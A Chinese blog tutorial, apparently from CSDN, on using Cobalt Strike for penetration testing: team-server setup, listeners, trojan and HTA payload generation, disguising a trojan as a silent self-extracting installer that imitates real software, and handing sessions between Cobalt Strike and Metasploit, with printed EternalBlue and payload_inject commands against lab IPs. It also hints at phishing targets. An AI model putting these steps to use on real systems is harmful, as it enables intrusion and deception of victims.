CobaltStrike基本渗透

目录

CobaltStrike简介

主要功能:

使用注意:        在使用CobaltStrike进行渗透测试时,务必遵守法律法规,并获得合法授权。

CobaltStrike安装

前提

安装

服务端安装

windows安装

CS基本使用

监听器配置

一些基本的攻击

生成木马,靶机上线(此次演示木马生成在自己的电脑上,然后双击启动木马)

​编辑

 木马的伪装(自解压安装包设置)

生成hta文件,靶机上线

CS和MSF联动

CS会话传递到MSF上

设置外部监听器

配置msf,msf运行之后会获取会话

设置监听转移,选择外部监听器

结果

msf会话传递至CS上

首先先利用msf上线一台靶机

cs设置监听

msf设置派生

结果


CobaltStrike简介

CobaltStrike(简称CS)是一款专业的团队作战渗透测试工具,包含客户端和服务端两个部分。以下是关于CobaltStrike的简单介绍:

主要功能:

持久化、横向移动:在已经取得攻击目标控制权后,CobaltStrike能够用于在目标系统中保持长期存在,并进行横向移动,扩大攻击范围。

流量隐藏:通过其独特的技术手段,CobaltStrike可以有效地隐藏网络流量,使攻击行为难以被检测和追踪。

数据窃取:CobaltStrike还具备数据窃取能力,能够从目标系统中提取敏感信息。

使用注意:
        在使用CobaltStrike进行渗透测试时,务必遵守法律法规,并获得合法授权。

CobaltStrike安装

前提

在安装CobaltStrike时,设备上需要部署jdk8以上的环境

安装

服务端安装在kali或者云服务器上,客户端安装在Windows上

服务端安装

(下列演示为在kali中安装)

将CobaltStrike安装包中服务端拖进kali中

 在kali桌面文件夹中找到CobaltStrike(以下统称CS)找到teamserver文件,修改文件权限为文件添加执行权限

chmod +x teamserver

执行该文件

./teamserver 本机ip地址 自己设置的密码

 后面会出现如下图所示界面

windows安装

打开CS的客户端,点击如下图框起来的地方

 开始会有如下弹窗

之后会有如下弹窗,下列弹窗中Host填写Server端 IP地址,Port设置为服务端设置端口,Password设置服务端中设置密码,User自己随意设置,然后点击连接

 然后就会出现如下图所示图片

这样就安装成功了

CS基本使用

监听器配置

在CS客户端中点击如下图所示图案

添加会话

一些基本的攻击

生成木马,靶机上线(此次演示木马生成在自己的电脑上,然后双击启动木马)

(木马也可以配合钓鱼攻击生成连接诱导被攻击点击)

选择创建位置

测试是否成功(下列图片测试成功的图片,可以打开机器的文件目录并且对其进行操作)

 木马的伪装(自解压安装包设置)

选择一个木马程序和一个常用的软件,使用winrar软件进行压缩,选择自解压压缩格式选择的这个格式可以让后缀变为exe

点击高级,选择自解压选项

选择解压路径,是一个别人都能访问的路径 ,windows所有人都有的路径就是C:UsersPublic

按照下图设置解压方式

选择解压方式,静默解压

选择更新模式和覆盖模式

设置图标

 

然后点击确定就可以了,然后再修改一下文件名称,他会生成一个如下图所示文件(上面的是正版,下面的是盗版。是不是很像)

上述步骤出来的自解压安装包是会被杀毒软件发现的。如果上述安装包再配合一些其他黑客技术就可以进行一些。。。

生成hta文件,靶机上线

点击生成hta文件

设置监听和脚本语言

设置监听端口

设置监听端口,和hta文件

设置完成后会给你一串网址

复制地址在靶机上使用mshta进行运行

靶机上线成功

上线之后就可以提权进行下一步渗透了

CS和MSF联动

CS会话传递到MSF上

设置外部监听器

配置msf,msf运行之后会获取会话
msf6 > use exploit/multi/handler

#下面代码与你在CS中配置有关

#payload对应外部监听的payload,lhost配置的是本地地址,lpost要和监听器相同

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http

msf6 exploit(multi/handler) > set lhost 192.168.244.141

msf6 exploit(multi/handler) > set lport 8085
设置监听转移,选择外部监听器

结果

会话成功转移到了msf上

msf会话传递至CS上

首先先利用msf上线一台靶机

这里用的是永恒之蓝漏洞上线的一台windows7靶机

msf6 > use exploit/windows/smb/ms17_010_eternalblue 
#设置攻击主机
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.244.146
#设置监听端口
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 8081
#攻击
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
cs设置监听

msf设置派生

在MSF中,exploit/windows/local/payload_inject 模块通常用于在已经获得Windows系统shell访问权限的情况下,向该系统的另一个进程注入一个payload。


#使用该模块可以将 Metasploit 获取到的会话注入到CS中
use exploit/windows/local/payload_inject
#和cs监听器保持一致
set payload windows/meterpreter/reverse_http 
#可以不设置,但是端口不要和CS冲突了。
set prependmigrate true   
# msf所在主机IP  
set lhost xxxx 
#CS上的listen端口
set lport XXX  
#要转发的session
set session 2   
run 
结果

会话已被cs获取

  • 33
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值